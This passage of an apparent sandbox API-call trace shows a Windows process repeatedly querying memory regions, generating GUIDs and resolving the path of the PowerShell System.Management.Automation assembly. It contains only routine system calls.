AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0141.320] VirtualQuery (in: lpAddress=0x25cfa8, lpBuffer=0x25dfa8, dwLength=0x1c | out: lpBuffer=0x25dfa8*(BaseAddress=0x25c000, AllocationBase=0x220000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0141.321] VirtualQuery (in: lpAddress=0x25cfe4, lpBuffer=0x25dfe4, dwLength=0x1c | out: lpBuffer=0x25dfe4*(BaseAddress=0x25c000, AllocationBase=0x220000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0141.321] VirtualQuery (in: lpAddress=0x25cfa8, lpBuffer=0x25dfa8, dwLength=0x1c | out: lpBuffer=0x25dfa8*(BaseAddress=0x25c000, AllocationBase=0x220000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0141.322] VirtualQuery (in: lpAddress=0x25cfe4, lpBuffer=0x25dfe4, dwLength=0x1c | out: lpBuffer=0x25dfe4*(BaseAddress=0x25c000, AllocationBase=0x220000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0141.322] VirtualQuery (in: lpAddress=0x25ce4c, lpBuffer=0x25de4c, dwLength=0x1c | out: lpBuffer=0x25de4c*(BaseAddress=0x25c000, AllocationBase=0x220000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0141.322] VirtualQuery (in: lpAddress=0x25cfa8, lpBuffer=0x25dfa8, dwLength=0x1c | out: lpBuffer=0x25dfa8*(BaseAddress=0x25c000, AllocationBase=0x220000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0141.323] VirtualQuery (in: lpAddress=0x25cfe4, lpBuffer=0x25dfe4, dwLength=0x1c | out: lpBuffer=0x25dfe4*(BaseAddress=0x25c000, AllocationBase=0x220000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0141.323] VirtualQuery (in: lpAddress=0x25cfa8, lpBuffer=0x25dfa8, dwLength=0x1c | out: lpBuffer=0x25dfa8*(BaseAddress=0x25c000, AllocationBase=0x220000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0141.323] VirtualQuery (in: lpAddress=0x25cfe4, lpBuffer=0x25dfe4, dwLength=0x1c | out: lpBuffer=0x25dfe4*(BaseAddress=0x25c000, AllocationBase=0x220000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0141.323] CoCreateGuid (in: pguid=0x25e358 | out: pguid=0x25e358*(Data1=0xa5814ec9, Data2=0x39c4, Data3=0x4156, Data4=([0]=0x9d, [1]=0x66, [2]=0x98, [3]=0xbc, [4]=0x0, [5]=0xf5, [6]=0xbb, [7]=0xc6))) returned 0x0 [0141.323] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x25da68, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0141.323] GetLastError () returned 0x0 [0141.323] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x25da18, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0141.323] GetLastError () returned 0x0 [0141.323] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x25da18, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0141.323] GetLastError () returned 0x0 [0141.324] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x25da68, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0141.324] GetLastError () returned 0x0 [0141.324] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x25da18, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0141.324] GetLastError () returned 0x0 [0141.324] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x25da18, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0141.324] GetLastError () returned 0x0 [0141.324] CoCreateGuid (in: pguid=0x25e358 | out: pguid=0x25e358*(Data1=0x2ee69a1d, Data2=0x3e8b, Data3=0x4db0, Data4=([0]=0xa6, [1]=0x9c, [2]=0xa7, [3]=0x36, [4]=0xc6, [5]=0x7a, [6]=0x94, [7]=0x4b))) returned 0x0 [0141.324] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x25da68, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0141.324] GetLastError () returned 0x0 [0141.324] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x25da18, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0141.324] GetLastError () returned 0x0 [0141.324] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x25da18, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0141.324] GetLastError () returned 0x0 [0141.324] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x25da68, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0141.324] GetLastError () returned 0x0 [0141.324] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x25da18, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0141.324] GetLastError () returned 0x0 [0141.324] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x25da18, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0141.324] GetLastError () returned 0x0 [0141.324] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x25dc00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0141.325] GetLastError () returned 0x0 [0141.325] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x25dbb0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0141.325] GetLastError () returned 0x0 [0141.325] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x25dbb0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0141.325] GetLastError () returned 0x0 [0141.325] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x25d830, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0141.325] GetLastError () returned 0x0 [0141.325] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x25d7e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0141.325] GetLastError () returned 0x0 [0141.325] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x25d7e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0141.325] GetLastError () returned 0x0 [0141.325] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x25dc00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0141.325] GetLastError () returned 0x0 [0141.325] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x25dbb0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0141.325] GetLastError () returned 0x0 [0141.325] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x25dbb0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0141.325] GetLastError () returned 0x0 [0141.326] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x25dc00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0141.326] GetLastError () returned 0x0 [0141.326] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x25dbb0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0141.326] GetLastError () returned 0x0 [0141.326] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x25dbb0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0141.326] GetLastError () returned 0x0 [0141.326] VirtualQuery (in: lpAddress=0x25cc04, lpBuffer=0x25dc04, dwLength=0x1c | out: lpBuffer=0x25dc04*(BaseAddress=0x25c000, AllocationBase=0x220000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0141.326] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x25d790, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0141.326] GetLastError () returned 0x0 [0141.326] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x25d740, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0141.326] GetLastError () returned 0x0 [0141.326] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x25d740, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0141.326] GetLastError () returned 0x0 [0141.326] VirtualQuery (in: lpAddress=0x25cc04, lpBuffer=0x25dc04, dwLength=0x1c | out: lpBuffer=0x25dc04*(BaseAddress=0x25c000, AllocationBase=0x220000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0141.327] VirtualQuery (in: lpAddress=0x25cc40, lpBuffer=0x25dc40, dwLength=0x1c | out: lpBuffer=0x25dc40*(BaseAddress=0x25c000, AllocationBase=0x220000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0141.327] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x25d5f8, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0141.327] GetLastError () returned 0x0 [0141.327] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x25d5a8, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0141.327] GetLastError () returned 0x0 [0141.327] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x25d5a8, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0141.327] GetLastError () returned 0x0 [0141.327] VirtualQuery (in: lpAddress=0x25cc04, lpBuffer=0x25dc04, dwLength=0x1c | out: lpBuffer=0x25dc04*(BaseAddress=0x25c000, AllocationBase=0x220000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0141.327] VirtualQuery (in: lpAddress=0x25cc40, lpBuffer=0x25dc40, dwLength=0x1c | out: lpBuffer=0x25dc40*(BaseAddress=0x25c000, AllocationBase=0x220000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0141.327] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x25d5f8, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0141.327] GetLastError () returned 0x0 [0141.327] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x25d5a8, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0141.327] GetLastError () returned 0x0 [0141.327] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x25d5a8, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0141.327] GetLastError () returned 0x0 [0141.327] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x25d790, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0141.328] GetLastError () returned 0x0 [0141.328] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x25d740, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0141.328] GetLastError () returned 0x0 [0141.328] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x25d740, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0141.328] GetLastError () returned 0x0 [0141.328] VirtualQuery (in: lpAddress=0x25cc04, lpBuffer=0x25dc04, dwLength=0x1c | out: lpBuffer=0x25dc04*(BaseAddress=0x25c000, AllocationBase=0x220000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0141.328] VirtualQuery (in: lpAddress=0x25cc40, lpBuffer=0x25dc40, dwLength=0x1c | out: lpBuffer=0x25dc40*(BaseAddress=0x25c000, AllocationBase=0x220000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0141.328] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x25d5f8, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0141.328] GetLastError () returned 0x0 [0141.328] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x25d5a8, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0141.328] GetLastError () returned 0x0 [0141.328] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x25d5a8, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0141.328] GetLastError () returned 0x0 [0141.329] VirtualQuery (in: lpAddress=0x25cc04, lpBuffer=0x25dc04, dwLength=0x1c | out: lpBuffer=0x25dc04*(BaseAddress=0x25c000, AllocationBase=0x220000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0141.329] VirtualQuery (in: lpAddress=0x25cc40, lpBuffer=0x25dc40, dwLength=0x1c | out: lpBuffer=0x25dc40*(BaseAddress=0x25c000, AllocationBase=0x220000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0141.329] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x25d790, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0141.329] GetLastError () returned 0x0 [0141.329] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x25d740, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0141.329] GetLastError () returned 0x0 [0141.329] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x25d740, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0141.329] GetLastError () returned 0x0 [0141.329] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x25d790, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0141.329] GetLastError () returned 0x0 [0141.329] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x25d740, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0141.329] GetLastError () returned 0x0 [0141.329] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x25d740, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0141.329] GetLastError () returned 0x0 [0141.329] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x25d790, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0141.329] GetLastError () returned 0x0 [0141.329] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x25d740, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0141.329] GetLastError () returned 0x0 [0141.329] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x25d740, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0141.329] GetLastError () returned 0x0 [0141.330] VirtualQuery (in: lpAddress=0x25cc04, lpBuffer=0x25dc04, dwLength=0x1c | out: lpBuffer=0x25dc04*(BaseAddress=0x25c000, AllocationBase=0x220000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0141.330] VirtualQuery (in: lpAddress=0x25cc40, lpBuffer=0x25dc40, dwLength=0x1c | out: lpBuffer=0x25dc40*(BaseAddress=0x25c000, AllocationBase=0x220000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0141.330] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x25d5f8, lpFilePart=0x0 | out: 